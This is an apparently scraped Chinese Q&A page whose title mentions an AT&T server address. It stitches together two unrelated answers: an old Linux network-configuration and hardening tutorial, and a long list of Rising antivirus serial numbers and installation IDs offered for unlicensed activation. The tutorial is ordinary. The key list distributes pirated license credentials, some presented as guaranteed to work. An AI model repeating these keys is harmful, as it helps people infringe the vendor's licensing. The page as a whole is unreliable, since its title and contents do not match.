當前位置:首頁 » 雲伺服器 » atu0026t伺服器地址

atu0026t伺服器地址

發布時間: 2022-06-29 04:02:44

linux中的網路配置。。

一.安裝和配置網路設備

在安裝linux時,如果你有網卡,安裝程序將會提示你給出tcp/ip網路的配置參數,如本機的 ip地址,預設網關的ip地址,DNS的ip地址等等.根據這些配置參數,安裝程序將會自動把網卡(linux系統首先要支持)驅動程序編譯到內核中去.但是我們一定要了解載入網卡驅動程序的過程,那麼在以後改變網卡,使用多個網卡的時候我們就會很容易的操作.網卡的驅動程序是作為模塊載入到內核中去的,所有linux支持的網卡驅動程序都是存放在目錄/lib/moles/(linux版本號)/net/ ,例如inter的82559系列10/100M自適應的引導網卡的驅動程序是eepro100.o,3COM的3C509 ISA網卡的驅動程序是3C509.o,DLINK的pci 10網卡的驅動程序是via-rhine.o,NE2000兼容性網卡的驅動程序是ne2k-pci.o和ne.o.在了解了這些基本的驅動程序之後,我們就可以通過修改模塊配置文件來更換網卡或者增加網卡.

1. 修改/etc/conf.moles 文件

這個配置文件是載入模塊的重要參數文件,大家先看一個範例文件

#/etc/conf.moles

alias eth0 eepro100

alias eth1 eepro100

這個文件是一個裝有兩塊inter 82559系列網卡的linux系統中的conf.moles中的內容.alias命令表明以太口(如eth0)所具有的驅動程序的名稱,alias eth0 eepro100說明在零號乙太網口所要載入的驅動程序是eepro100.o.那麼在使用命令 modprobe eth0的時候,系統將自動將eepro100.o載入到內核中.對於pci的網卡來說,由於系統會自動找到網卡的io地址和中斷號,所以沒有必要在conf.moles中使用選項options來指定網卡的io地址和中斷號.但是對應於ISA網卡,則必須要在conf.moles中指定硬體的io地址或中斷號, 如下所示,表明了一塊NE的ISA網卡的conf.moles文件.

alias eth0 ne

options ne io=0x300 irq=5

在修改完conf.moles文件之後,就可以使用命令來載入模塊,例如要插入inter的第二塊網卡:

#insmod /lib/moles/2.2.14/net/eepro100.o

這樣就可以在以太口載入模塊eepro100.o.同時,還可以使用命令來查看當前載入的模塊信息:

[root@ice /etc]# lsmod

Mole Size Used by

eepro100 15652 2 (autoclean)

返回結果的含義是當前載入的模塊是eepro100,大小是15652個位元組,使用者兩個,方式是自動清除.

2. 修改/etc/lilo.conf文件

在一些比較新的linux版本中,由於操作系統自動檢測所有相關的硬體,所以此時不必修改/etc/lilo.conf文件.但是對於ISA網卡和老的版本,為了在系統初始化中對新加的網卡進行初始化,可以修改lilo.conf文件.在/etc/lilo.conf文件中增加如下命令:

append="ether=5,0x240,eth0 ether=7,0x300,eth1"

這條命令的含義是eth0的io地址是0x240,中斷是5,eth1的io地址是0x300,中斷是7.

實際上,這條語句來自在系統引導影像文件時傳遞的參數,

LILO: linux ether=5,0x240,eth0 ether=7,0x300,eth1

這種方法也同樣能夠使linux系統配置好兩個網卡.類似的,在使用三個以上網卡的時候,也可以依照同樣的方法.

在配置好網卡之後,就應該配置TCP/IP的參數,在一般情況下,在安裝linux系統的同時就會提示你配置網路參數.但是之後如果我們想要修改網路設置,可以使用如下的命令:

#ifconfig eth0 A.B.C.D netmask E.F.G.H

A.B.C.D 是eth0的IP地址,E.F.G.H是網路掩碼.

其實,在linux系統中我們可以給一塊網卡設置多個ip地址,例如下面的命令:

#ifconfig eth0:1 202.112.11.218 netmask 255.255.255.192

然後,使用命令#ifconfig -a 就可以看到所有的網路介面的界面:

eth0 Link encap:Ethernet HWaddr 00:90:27:58:AF:1A
inet addr:202.112.13.204 Bcast:202.112.13.255 Mask:255.255.255.192
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:435510 errors:0 dropped:0 overruns:0 frame:2
TX packets:538988 errors:0 dropped:0 overruns:0 carrier:0
collisions:318683 txqueuelen:100
Interrupt:10 Base address:0xc000

eth0:1 Link encap:Ethernet HWaddr 00:90:27:58:AF:1A
inet addr:202.112.11.218 Bcast:202.112.11.255 Mask:255.255.255.192
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:10 Base address:0xc000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:3924 Metric:1
RX packets:2055 errors:0 dropped:0 overruns:0 frame:0
TX packets:2055 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0

我們看到網路介面有三個,eth0 , eth0:1,lo,eth0是真實的乙太網絡介面,eth0:1和eth0是同一塊網卡,只不過綁定了另外的一個地址,lo是會送地址。eth0和eth0:1可以使用不同網段的ip地址,這在同一個物理網段卻使用不同的網路地址的時候十分有用。

另外,網卡有一種模式是混雜模式(prosimc),在這個模式下,網卡將會接收網路中所有的數據包,一些linux下的網路監聽工具例如tcpmp,snort等等都是把網卡設置為混雜模式.

ifconfig命令可以在本次運行的時間內改變網卡的ip地址,但是如果系統重新啟動,linux仍然按照原來的默認的設置啟動網路介面。這時候,可以使用netconfig或netconf命令來重新設置默認網路參數。netconfig 命令是重新配置基本的tcp/ip參數,參數包括是否配置為動態獲得ip地址(dhcpd和bootp),網卡的ip地址,網路掩碼,預設網關和首選的域名伺服器地址。netconf命令可以詳細的配置所有網路的參數,分為客戶端任務,伺服器端任務和其他的配置三個部分,在客戶端的配置中,主要包括基本主機的配置(主機名,有效域名,網路別名,對應相應網卡的ip地址,網路掩碼,網路設備名,網路設備的內核驅動程序),DNS地址配置,預設網關的地址配置,NIS地址配置,ipx介面配置,ppp/slip的配置等等。在伺服器端配置中,主要包括NFS的配置,DNS的配置,ApacheWebServer配置,Samba的配置和Wu-ftpd的配置。在其他的配置選項中,一個是關於/etc/hosts文件中的主機配置,一個是關於/etc/networks文件中的網路配置信息,最後是關於使用linuxconf配置的信息。

在linuxconf命令下,同樣也可以配置網路信息,但是大家可以發現,linuxconf程序是調用netconf來進行網路配置的。

另外,在/etc/sysconfig/network-scripts目錄下存放著系統關於網路的配置文件,範例如下:

:<br><br>
ifcfg-eth0* ifdown-post* ifup-aliases* ifup-ppp*
ifcfg-eth1* ifdown-ppp* ifup-ipx* ifup-routes*
ifcfg-lo* ifdown-sl* ifup-plip* ifup-sl*
ifdown@ ifup@ ifup-post* network-functions

ifcfg-eth0是以太口eth0的配置信息,它的內容如下:

DEVICE="eth0" /*指明網路設備名稱*/
IPADDR="202.112.13.204" /*指明網路設備的ip地址*/
NETMASK="255.255.255.192" /*指明網路掩碼*/
NETWORK=202.112.13.192 /*指明網路地址*/
BROADCAST=202.112.13.255 /*指明廣播地址*/
ONBOOT="yes" /*指明在系統啟動時是否激活網卡*/
BOOTPROTO="none" /*指明是否使用bootp協議*/

所以,我們也可以修改這個文件來進行linux下網路參數的改變。[/SIZE]

--------------------------------------------------------------------------------

二 網路服務的配置

在這一部分,我們並不是詳細的介紹具體的網路伺服器(DNS,FTP,WWW,SENDMAIL)的配置(那將是巨大的篇幅),而是介紹一下與linux網路服務的配置相關的文件.

1. LILO的配置文件

在linux系統中,有一個系統引導程序,那就是lilo(linux loadin),利用lilo可以實現多操作系統的選擇啟動.它的配置文件是/etc/lilo.conf.在這個配置文件中,lilo的配置參數主要分為兩個部分,一個是全局配置參數,包括設置啟動設備等等.另一個是局部配置參數,包括每個引導影像文件的配置參數.在這里我就不詳細介紹每個參數,特別的僅僅說明兩個重要的參數:password和restricted選項,password選項為每個引導的影像文件加入口令保護.

我們都知道,在linux系統中有一個運行模式是單用戶模式,在這個模式下,用戶是以超級用戶的身份登錄到linux系統中.人們可以通過在lilo引導的時候加入參數(linux single 或linux init 0)就可以不需要口令直接進入單用戶模式的超級用戶環境中,這將是十分危險的.所以在lilo.conf中增加了password的配置選項來為每個影像文件增加口令保護.

你可以在全局模式中使用password選項(對所有影像文件都加入相同的口令),或者為每個單獨的影像文件加入口令.這樣一來,在每次系統啟動時,都會要求用戶輸入口令.也許你覺得每次都要輸入口令很麻煩,可以使用restricted選項,它可以使lilo僅僅在linux啟動時輸入了參數(例如 linux single)的時候才會檢驗密碼.這兩個選項可以極大的增加系統的安全性,建議在lilo.conf文件中設置它們.

由於password在/etc/lilo.conf文件是以明文存放的,所以必須要將/etc/lilo.conf文件的屬性改為僅僅root可讀(0400).

另外,在lilo的早期版本中,存在著引導扇區必須存放到前1024柱面的限制,在lilo的2.51版本中已經突破了這個限制,同時引導界面也變成了圖形界面更加直觀.將最新版本下載解壓後,使用命令make" 後,使用命令make install即可完成安裝.注意: 物理安全才是最基本的安全,即使在lilo.conf中增加了口令保護,如果沒有物理安全,惡意闖入者可以使用啟動軟盤啟動linux系統.

2. 域名服務的配置文件

(1)/etc/HOSTNAME 在這個文件中保存著linux系統的主機名和域名.範例文件

ice.xanet.e.cn

這個文件表明了主機名ice,域名是xanet.e.cn

(2)/etc/hosts和/etc/networks文件 在域名服務系統中,有著主機表機制,/etc/hosts和/etc/networks就是主機表發展而來在/etc/hosts中存放著你不需要DNS系統查詢而得的主機ip地址和主機名的對應,下面是一個範例文件:

# ip 地址 主機名 別名

127.0.0.1 localhosts loopback

202.117.1.13 www.xjtu.e.cn www

202.117.1.24 ftp.xjtu.e.cn ftp

在/etc/networks 中,存放著網路ip地址和網路名稱的一一對應.它的文件格式和/etc/hosts是類似的

(3)/etc/resolv.conf 這個文件是DNS域名解析器的主要配置文件,它的格式十分簡單,每一行由一個主關鍵字組成./etc/resolv.conf的關鍵字主要有:

domain 指明預設的本地域名,
search 指明了一系列查找主機名的時候搜索的域名列表,
nameserver 指明了在進行域名解析時域名伺服器的ip地址.下面給出一個範例文件:
#/etc/resolv.conf
domain xjtu.e.cn
search xjtu.e.cn e.cn
nameserver 202.117.0.20
nameserver 202.117.1.9

(4)/etc/host.conf 在系統中同時存在著DNS域名解析和/etc/hosts的主機表機制時,由文件/etc/host.conf來說明了解析器的查詢順序.範例文件如下:

#/etc/host.conf

order hosts,bind #解析器查詢順序是文件/etc/hosts,然後是DNS
multi on #允許主機擁有多個ip地址
nospoof on #禁止ip地址欺騙

3. DHCP的配置文件
/etc/dhcpd.conf是DHCPD的配置文件,我們可以通過在/etc/dhcpd.conf文件中的配置來實現在區域網中動態分配ip地址,一台linux主機設置為dhcpd伺服器,通過鑒別網卡的MAC地址來動態的分配ip地址.範例文件如下:

option domain-name "chinapub.com";
use-host-decl-names off;
subnet 210.27.48.0 netmask 255.255.255.192
{
filename "/tmp/image";
host dial_server
{
hardware ethernet 00:02:b3:11:f2:30;
fixed-address 210.27.48.8;
filename "/tmp/image";
}
}
在這個文件中,最主要的是通過設置的硬體地址來鑒別區域網中的主機,並分配給它指定的ip地址,hardware ethernet 00:02:b3:11:f2:30指定要動態分配ip的主機得網卡的MAC地址,fixed-address 210.27.48.8指定分配其ip地址。filename "/tmp/image"是通過tftp服務,主機所要得到的影像文件,可以通過得到的影像文件來引導主機啟動。

4. 超級守候進程inetd的配置

在linux系統中有一個超級守候進程inetd,inetd監聽由文件/etc/services指定的服務的埠,inetd根據網路連接請求,調用相應的服務進程來相應請求.在這里有兩個文件十分重要,/etc/inetd.conf和/etc/services,文件/etc/services定義linu系統中所有服務的名稱,協議類型,服務的埠等等信息,/etc/inetd.conf是inetd的配置文件,由它來指定那些服務可以由inetd來監聽,以及相應的服務進程的調用命令.首先介紹一下/etc/services文件,/etc/services文件是一個服務名和服務埠對應的資料庫文件,如下面所示:/etc/services文件

(實際上,以上僅僅是/etc/services的一部分,限於篇幅沒有全部寫出)

在這個文件中,為了安全考慮,我們可以修改一些常用服務的埠地址,例如我們可以把telnet服務的埠地址改為52323,www的埠改為8080,ftp埠地址改為2121等等,這樣僅僅需要在應用程序中修改相應的埠即可.這樣可以提高系統的安全性.

/etc/inetd.conf文件是inetd的配置文件, 首先要了解一下linux伺服器到底要提供哪些服務。一個很好的原則是" 禁止所有不需要的服務",這樣黑客就少了一些攻擊系統的機會./etc/inetd.conf範例文件

大家看到的這個文件已經修改過的文件,除了telnet 和ftp服務,其他所有的服務都被禁止了.在修改了/etc/inetd.conf之後,使用命令kill -HUP (inetd的進程號),使inetd重新讀取配置文件並重新啟動即可.

5. ip route的配置

利用linux,一台普通的微機也可以實現高性價比的路由器.首先讓我們了解一下linux的查看路由信息的命令:

[root@ice /etc]# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
202.112.13.204 0.0.0.0 255.255.255.255 UH 0 0 0 eth0
202.117.48.43 0.0.0.0 255.255.255.255 UH 0 0 0 eth1
202.112.13.192 202.112.13.204 255.255.255.192 UG 0 0 0 eth0
202.112.13.192 0.0.0.0 255.255.255.192 U 0 0 0 eth0
202.117.48.0 202.117.48.43 255.255.255.0 UG 0 0 0 eth1
202.117.48.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1
127.0.0.0 0.0.0.0 255.0.0.0 U 0 0 0 lo
0.0.0.0 202.117.48.1 0.0.0.0 UG 0 0 0 eth1
命令netstat -r n 得到輸出結果和route -n是一樣的.它們操作的都是linux 內核的路由表.

命令cat /proc/net/route的輸出結果是以十六進製表示的路由表.

[root@ice /etc]# cat /proc/net/route
Iface Destination Gateway Flags RefCnt Use Metric Mask
eth0 CC0D70CA 00000000 0005 0 0 0 FFFFFFF
eth1 2B3075CA 00000000 0005 0 0 0 FFFFFFF
eth0 C00D70CA CC0D70CA 0003 0 0 0 C0FFFFF
eth0 C00D70CA 00000000 0001 0 0 0 C0FFFFF
eth1 003075CA 2B3075CA 0003 0 0 0 00FFFFF
eth1 003075CA 00000000 0001 0 0 0 00FFFFF
lo 0000007F 00000000 0001 0 0 0 000000F
eth1 00000000 013075CA 0003 0 0 0 0000000
通過計算可以知道,下面的這個路由表(十六進制)和前面的路由表(十進制)是一致的.

我們還可以通過命令route add (del )來操作路由表,增加和刪除路由信息.

除了上面的靜態路由,linux還可以通過routed來實現rip協議的動態路由.我們只需要打開linux的路由轉發功能,在/proc/sys/net/ipv4/ip_forward文件中增加一個字元1.

三.網路的安全設置
在這一部分,再次強調一定要修改/etc/inetd.conf,安全的策略是禁止所有不需要的服務.除此之外,還有以下幾個文件和網路安全相關.

(1)./etc/ftpusers ftp服務是一個不太安全的服務,所以/etc/ftpusers限定了不允許通過ftp訪問linux主機的用戶列表.當一個ftp請求傳送到ftpd,ftpd首先檢查用戶名,如果用戶名在/etc/ftpusers中,則ftpd將不會允許該用戶繼續連接.範例文件如下:

# /etc/ftpusers - users not allowed to login via ftp
root
bin
daemon
adm
lp
sync
shutdown
halt
mail
news
uucp
operator
games
nobody
nadmin

(2)/etc/securetty 在linux系統中,總共有六個終端控制台,我們可以在/etc/securetty中設置哪個終端允許root登錄,所有其他沒有寫入文件中的終端都不允許root登錄.範例文件如下:

# /etc/securetty - tty's on which root is allowed to login
tty1
tty2
tty3
tty4
(3)tcpd的控制登錄文件/etc/hosts.allow和/etc/hosts.deny

在tcpd服務進程中,通過在/etc/hosts.allow和/etc/hosts.deny中的訪問控制規則來控制外部對linux主機的訪問.它們的格式都是

service-list : hosts-list [ : command]

服務進程的名稱 : 主機列表 可選,當規則滿足時的操作

在主機表中可以使用域名或ip地址,ALL表示匹配所有項,EXCEPT表示除了某些項, PARANOID表示當ip地址和域名不匹配時(域名偽裝)匹配該項.

範例文件如下:

#
# hosts.allow This file describes the names of the hosts which are
# allowed to use the local INET services, as decided
# by the '/usr/sbin/tcpd' server.
#
ALL : 202.112.13.0/255.255.255.0
ftpd: 202.117.13.196
in.telnetd: 202.117.48.33
ALL : 127.0.0.1
在這個文件中,網段202.112.13.0/24可以訪問linux系統中所有的網路服務,主機202.117.13.196隻能訪問ftpd服務,主機202.117.48.33隻能訪問telnetd服務.本機自身可以訪問所有網路服務.

在/etc/hosts.deny文件中禁止所有其他情況:

#/etc/hosts.deny

ALL : DENY : spawn (/usr/bin/finger -lp @%h | /bin/mail -s "Port Denial noted in %d-%h" root)

在/etc/hosts.allow中,定義了在所有其他情況下,linux所應該執行的操作.spawn選項允許linux系統在匹配規則中執行指定的shell命令,在我們的例子中,linux系統在發現無授權的訪問時,將會發送給超級用戶一封主題是"Port Denial noted in %d-%h"的郵件,在這里,我們先要介紹一下allow和deny文件中的變數擴展.

(4)/etc/issue和/etc/issue.net

在我們登錄linux系統中的時候,我們常常可以看到我們linux系統的版本號等敏感信息.在如今的網路攻擊行為中,許多黑客首先要收集目標系統的信息,版本號等就是十分重要的信息,所以在linux系統中一般要把這些信息隱藏起來./etc/issue和/etc/issue.net就是存放這些信息的文件.我們可以修改這些文件來隱藏版本信息.

另外,在每次linux重新啟動的時候,都會在腳本/etc/rc.d/rc.local中再次覆蓋上面那兩個文件./etc/rc.d/rc.local文件的範例如下:

# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.
if [ -f /etc/redhat-release ]; then
R=$(cat /etc/redhat-release)
arch=$(uname -m)
a="a"
case "_$arch" in
_a*) a="an";;
_i*) a="an";;
esac
NUMPROC=`egrep -c "^cpu[0-9]+" /proc/stat`
if [ "$NUMPROC" -gt "1" ]; then
SMP="$NUMPROC-processor "
if [ "$NUMPROC" = "8" -o "$NUMPROC" = "11" ]; then
a="an"
else
a="a"
fi
fi
# This will overwrite /etc/issue at every boot. So, make any changes you
# want to make to /etc/issue here or you will lose them when you reboot.
#echo "" > /etc/issue
#echo "$R" >> /etc/issue
# echo "Kernel $(uname -r) on $a $SMP$(uname -m)" >> /etc/issue
cp -f /etc/issue /etc/issue.net
echo >> /etc/issue
在文件中黑體的部分就是得到系統版本信息的地方.一定要將他們注釋掉.

(5)其他配置

在普通微機中,都可以通過ctl+alt+del三鍵的組合來重新啟動linux.這樣是十分不安全的,所以要在/etc/inittab文件中注釋該功能:

# Trap CTRL-ALT-DELETE

#ca::ctrlaltdel:/sbin/shutdown -t3 -r now

Ⅱ 求瑞星的序列號和IP地址

2007年07月04日 星期三 下午 04:01瑞星序列號 最新瑞星ID號 2007最新瑞星殺毒序列號

產品序列號ANFUHD-2GSVKB-8L5BS7-WND200 用戶ID: W5B2AT4DWEU9
BFPU69-IRV6HI-CMG1RQ-F2D200 ID:W2LDSHHHM4G5 。
推薦你使用下面這個100%可以用:
CWBW79-B6RV1R-AQLJ53-DQD200 (ID任意是8位的)
瑞星殺毒軟體2006版 T1BULQ-70AWDE-9P90SF-7TD200 用戶安裝ID:RB2NA22T
瑞星殺毒軟體2006版 SDDJ45-MSBCQ1-DMJPSA-GN5200 用戶安裝ID:RCVUKEGX
瑞星殺毒瑞星殺毒軟體序列號和ID號軟體2006版 52LDJG-Q9LBCT-6ACQL2-R35200 用戶安裝ID: RCVUKEGX
瑞星殺毒軟體2006版 V5V0WL-NGFHWU-DT2VRM-N45200 用戶安裝ID:W15CV5M3GF6Q
瑞星殺毒軟體2006版 RIUEKR-EKNBL6-JLE9S0-9QD200 用戶安裝ID:5AZHHTBBAB48
瑞星殺毒軟體2006版 {VUSBRC-FMES6J-3UIFS6-PT5200}
{TV3MI2-N6GTCG-LQL8S5-7L5200} 升級ID: 4AJRY64DNA4G
{52LDJG-Q9LBCT-6ACQS2-R35200}
(推薦你使用下面這個)
產品序列號:G13T87-T18VR1-W098SA-IKD200 ID:任意(隨便輸入就可以了)
瑞星個人防火牆下載版序號:
9G9V0Q-A92E86-AJCTRN-9RD200升級ID:RCX89JYL
36RDFV-PQMJ3W-M65EGV-RN4200升級ID:TAZH7S1E
TJ1A8E-F4PAI3-JQBGSA-BKD200升級ID:5AKRZATXWC4F

可在線升級的瑞星序列號(供參考)
序列號: 52LDJG-Q9LBCT-6ACQ52-R35200 授權ID:RCHVDD9T
序列號: EWUVP3-3NWFMO-PUMFS2-PT5200 授權ID:RCHVDD9T
序列號: JUQVN2 CWEFLP J7JAC3 Q23200 授權ID:RCHVEPWV
序列號: JUQVN2 CWEFLP J7JAC3 Q23200 授權ID:RCHVEPWV
序列號: U0I26A-W84GHI-NR8KSB-SU6200 授權ID:RCRSM1SU
序列號: HW5P8T-4FQE27-13N3SQ-IT5200 授權ID:RCHVE6RN
序列號:V6LGRK-FGLDVL-3T49RL-V15200 用戶安裝ID:W15CF5MCFWRQ
序列號:TV3MI2-N6GTCG-LQL8S5-7L5200 用戶安裝ID:W1QC96MXA8L4
序列號:V5V0WL-NGFHWU-DT2VRM-N45200 用戶安裝ID:W15CV5M3GF6Q
序列號: 52LDJG-Q9LBCT-7ACQS2-R35200 用戶安裝ID:4AJRY64DNA4G
序列號: 4A7I9W-92HTIF-R8UWSM-FK5200 用戶安裝ID:W2PC4VRZFZ4D
序列號: W13KIE-NP8U4J-LV82S3-VH5200 用戶安裝ID:W15CF5MCFWRQ
序列號: TV3MI2-N6GTCG-LQL8S5-7L5200 用戶安裝ID:W1QC96MXA8L4
序列號: AM01HI-RKG1KC-ML15S5-UUD200 用戶安裝ID:W2L2CYG9QK7J
序列號: 4KS0LG-146QUC-092JRL-T8D200 用戶安裝ID:W2C25JCJHALB
序列號: C6441W-J0H0PF-TP1AS5-45D200 用戶安裝ID:W2G2YY7T33PF
序列號: A7GMKR-2GT4D6-GK24S8-9GD200 用戶安裝ID:W2C2KYEMJ3UX
序列號: AC9G7K-2I2DQU-0KLHRN-J2D200 用戶安裝ID:W2428YEFRACH
序列號: ACKWII-AI564K-IKLQRN-HWD200 用戶安裝ID:W2B27YE6Y13T
序列號: NKL8HB-DT5BTA-SF69RH-WUD200 用戶安裝ID:W22D3EJGK5Z3
序列號: NKNJP5-LT5U61-DF6CRL-PMD200 用戶安裝ID:W2ZDMEJQKXIA
序列號: W1EB04-FQBJ01-3V8FSB-PG5200 用戶安裝ID:W252BGJASD5R
序列號: TIW2MK-W5NQDL-7QFDRK-395200 用戶安裝ID:W2Z2CGJHSC2H
序列號: 54VUUH-187MNC-8A4PR2-WPD200 用戶安裝ID:W2T2GXEUGYI4
序列號: 3UN97B-PVDSHR-V7NURN-NAD200 用戶安裝ID:W2U28WW15E43
序列號: 4WW961-16WSHG-89ITRH-SRD200 用戶安裝ID:W2X279SDENS5
序列號: 7L2PC9-QT8NS2-EF56RR-E1D200 用戶安裝ID:W24DWC5BVTKT
序列號: 67QTD0-HGVES8-4C0HRG-NQD200 用戶安裝ID:W2ZDBC4QAXQG
序列號: 0473L2-801Q58-I07WRS-THD200 用戶安裝ID:W2CDFFVQMF9Z
序列號: QTT8R8-VA73VI-7JGKS3-CN5200 用戶安裝ID:W3SC9N1VWBWG
序列號: I60FED-4GG23J-945FS0-W55200 用戶安裝ID:W2WC7MYGXC9U
序列號: TCS1VM-W26QNL-NPGKRJ-VW5200 用戶安裝ID:W1DCD5PVTJTV
序列號: DLL220-JFD98G-4S24S4-NJ5200 用戶安裝ID:W4NCRP3YUGME
序列號: RLDPI3-EKBFTG-SL32S6-Q05200 用戶安裝ID:W2VC3WFUHAC7
序列號: VLL76J-7ND81K-QU21S2-SM5200 用戶安裝ID:W4YCJQZ3V8KA
序列號: 9SJ43W-IFTPPW-TJU0SN-NN5200 用戶安裝ID:W2F2PACJMXF3
序列號: IRTG70-CNN5QP-35WQS1-IT5200 用戶安裝ID:W222L13RC9CN
序列號: 4IPNFN-H5M43U-T9FHS3-EF5200 用戶安裝ID:W27241QXWXHL
序列號: 802VUH-210MFC-8GALRK-AM5200 用戶安裝ID:W2E26FFI5XTN
序列號: SC25AJ-6R0GIK-QMN6RK-QPD200 用戶安裝ID:W2IDCE9KXPKS
序列號: AK21HI-AK0HKC-IL56RN-TTD200 用戶安裝ID:W2F2T9GM5EIP
序列號: AML8U3-IKLBW8-TL48S7-8Q5200 用戶安裝ID:W24CD58QN7EL
序列號: RSQM3D-ENVC8S-BLU0S1-SN5200 用戶安裝ID:W2X23ERN1UFP
序列號: DCWU73-3A7VHP-PRGURL-UP5200 用戶安裝ID:W1W2N2VWAYNZ
序列號: SINM7D-MULT9S-DNF0S4-Q85200 用戶安裝ID:W2X2HB7H3PAN
序列號: 7TU4HQ-QV78TE-EFG3RG-U35200 用戶安裝ID:W28CBY6FHA22
序列號: SPWETF-6W7RF3-QNSFS6-S15200 用戶安裝ID:W2W2UGRKL2ER
序列號: 3QFAUA-GWBSFA-K7PVRK-225200 用戶安裝ID:W2T2YCPTBW1J
序列號: 92Q40U-R9M8P7-EIFUSA-PI5200 用戶安裝ID:W242XDDYWXH7
序列號: FJ5MT4-SQQCF1-6WA5S8-RLD200 用戶安裝ID:4H98RL8V3B44
序列號: S3331I-MUPQ0C-LMA9S6-CHD200 用戶安裝ID:4HP2FMLVNB4B
序列號: 7CET7T-HR3MQW-4EMQRB-J2D200 用戶安裝ID:4H77DRQC1242
序列號: 3E0D6R-0VG2HM-G6G2RK-8VD200 用戶安裝ID:4HBIYQX88B4B
序列號: QM99D8-M8IBJA-5J0DS7-5CD200 用戶安裝ID:4HB24VIY1B4U
序列號: RT6221-MM1H8G-DLM8RG-8PD200 用戶安裝ID:4HV7MWPC524J
序列號: LDQ5RQ-LAE8MM-DALMRG-9PD200 用戶安裝ID:4HDP6HPCC245

此更新了瑞星2006防火牆新序列號和ID.請網友們相互轉告.
序列號:N0A81N-LQ2JPD-UEDRRG-2VD200
用戶ID:F25CKRIR4XNQ

瑞星殺毒軟體2006升級包以及的序列號
產品序列號:7JE9R9-QTSIEI-EFF4SB-EJ5200
產品序列號:52LDJG-Q9LBCT-6ACQX2-R38200
產品序列號:52LDJG-Q9LBCT-6ACQ52-R35400
產品序列號:52LDJG-Q9LBCT-6ACQS2-R35200
用戶安裝ID:4AJRY64DNA4G

產品序列號:77PUHE-QPV6KB-ME6JS3-KM5200
用戶安裝ID:W28CYL3L84PR
產品序列號:V6LGRK-FGLDVL-3T49RL-V15200
用戶安裝ID:W15CF5MCFWRQ
產品序列號:TV3MI2-N6GTCG-LQL8S5-7L5200
用戶安裝ID:W1QC96MXA8L4
產品序列號:V5V0WL-NGFHWU-DT2VRM-N45200
用戶安裝ID:W15CV5M3GF6Q
回答者:showass - 助理 三級 4-8 16:42

產品序列號ANFUHD-2GSVKB-8L5BS7-WND200 用戶ID: W5B2AT4DWEU9
BFPU69-IRV6HI-CMG1RQ-F2D200 ID:W2LDSHHHM4G5 。
推薦你使用下面這個100%可以用:
CWBW79-B6RV1R-AQLJ53-DQD200 (ID任意是8位

瑞星殺毒軟體2006/2007下載版序列號
SN:T1BULQ-70AWDE-9P90SF-7TD200 ID:RB2NA22T
SN:twhgm4-n2th-5qj7rm-06d200 ID:4h476397qb4p
SN:92Q40U-R9M8P7-EIFUSA-PI5200 ID:4hcph47tpb4x
SN:77PUHE-QPV6KB-ME6JS3-KM5200 ID:W15CF5MCFWRQ
SN:EK72D3-3K1QB8-PU7CRM-F1D200 ID:W2BDX2HW66TI
SN:DTRVAG-SA6MAK-6SLNRN-ASD200 ID:4HWKC868AB4X

瑞星個人防火牆2006/2007序列號
SN:T1BULQ-70AWDE-9P90SF-7TD200 ID:RB2NA22T
SN:VQ6RIK-FJ9NCL-3UV1S4-QCD200 ID:4HAHFNXT7B4C
SN:T1BULQ-70AWDE-9P90SF-7TD200 ID:RB2NA22T升級用
SN:77PUHE-QPV6KB-ME6JS3-KM5200 ID:W28CYL3L84PR
SN:9G9V0Q-A92E86-AJCTRN-9RD200 升級ID:RCX89JYL
SN:V5V0WL-NGFHWU-DT2VRM-N45200 ID:W15CV5M3GF6Q
SN:080K3M-02050U-G0PVSC-AJE200 ID:6A94GZSK6F4R

瑞星殺毒軟體2007和瑞星個人防火牆2007的序列號和ID
序列號:R40G6Q-6H041M-9K7HRK-KJD200 ID:6AMQCR3MJE4X 這是2006的,但是可以升級的2007
序列號:MI0TMS-5KG75M-QDDLS0-1VE200 ID:7AHRR6LPN34G
序列號:CSA5V1-S7RJNG-EQV4S6-G8E200 ID:U2MZUAJ6QFVR
序列號:KSILHN-57TKKD-Q9VCS5-KLE200 ID:W2NDV88L88BU
序列號:4QH7A6 H6C9RH K9PSSC SUD200 ID:5ATRBGE53B4L
序列號:vusbrc-fmes6j-3uifs6-pt5200 ID:w2pc4vrzfz4d 光碟版(正版)
序列號:2R0EMP-GMG3LM-45RARH-8RD200 ID:5AI39QXQ224A 下載版(正版)
序列號:0IPVTW-P5M5F7-V1D2RM-N2E200 ID:U24ZBZ5817HA

瑞星殺毒軟體網路版序列號
20伺服器,60客戶端 3PVQNT-5JP184-9R8IJB-1F9108
10伺服器,14338客戶端 WS1H3W-WUWUU9-JL1D3Q-SF9108
10伺服器,100客戶端 86CEWS-WR44SP-6DGDR4-DAF008
10伺服器,50客戶端 WS1H3W-PLWUU9-JL1D3Q-SF9108
24伺服器,16736客戶端 2RE9VM-WUC1QA-51MA0T-DR9108
115伺服器,106客戶端 P28FLA-L0VCQL-BB8NM7-HJA108
1W9EVK-05RBUL-28W1S3-HCE208

------------------------------------------------------------------------------------------------------------

瑞星殺毒軟體2005序列號:RIUEKR-EKNBL6-JLE9S0-9QD200對應ID:5AZHHTBBAB48
VUSBRC-FMES6J-3UIFS6-PT5200 or 52LDJG-Q9LBCT-6ACQS2-R35200
TV3MI2-N6GTCG-LQL8S5-7L5200 升級ID: 4AJRY64DNA4G

可在線升級的瑞星序列號(供參考)

序列號:52LDJG-Q9LBCT-6ACQ52-R35200 授權ID:RCHVDD9T
序列號:EWUVP3-3NWFMO-PUMFS2-PT5200 授權ID:RCHVDD9T
序列號: JUQVN2 CWEFLP J7JAC3 Q23200 授權ID:RCHVEPWV
序列號: HW5P8T-4FQE27-13N3SQ-IT5200 授權ID:RCHVE6RN

----------------------更多瑞星2005殺毒個人版安裝序列號------------------

SN:TLHJP5-N4CD61-DQ7GRP-AMD200 ID:W2R2Q8T9LN2C
SN:NNRJ4Q-UTVL16-FF60S5-UJ5200 ID:任意
W13KIE-NP8U4J-LV82S3-VH9400 QTT8R8-VA73VI-7JGKS3-CN5200
IRTG70-CNN5QP-35WQS1-IT5200 U0I26A-W84GHI-NR8KSB-SU9300
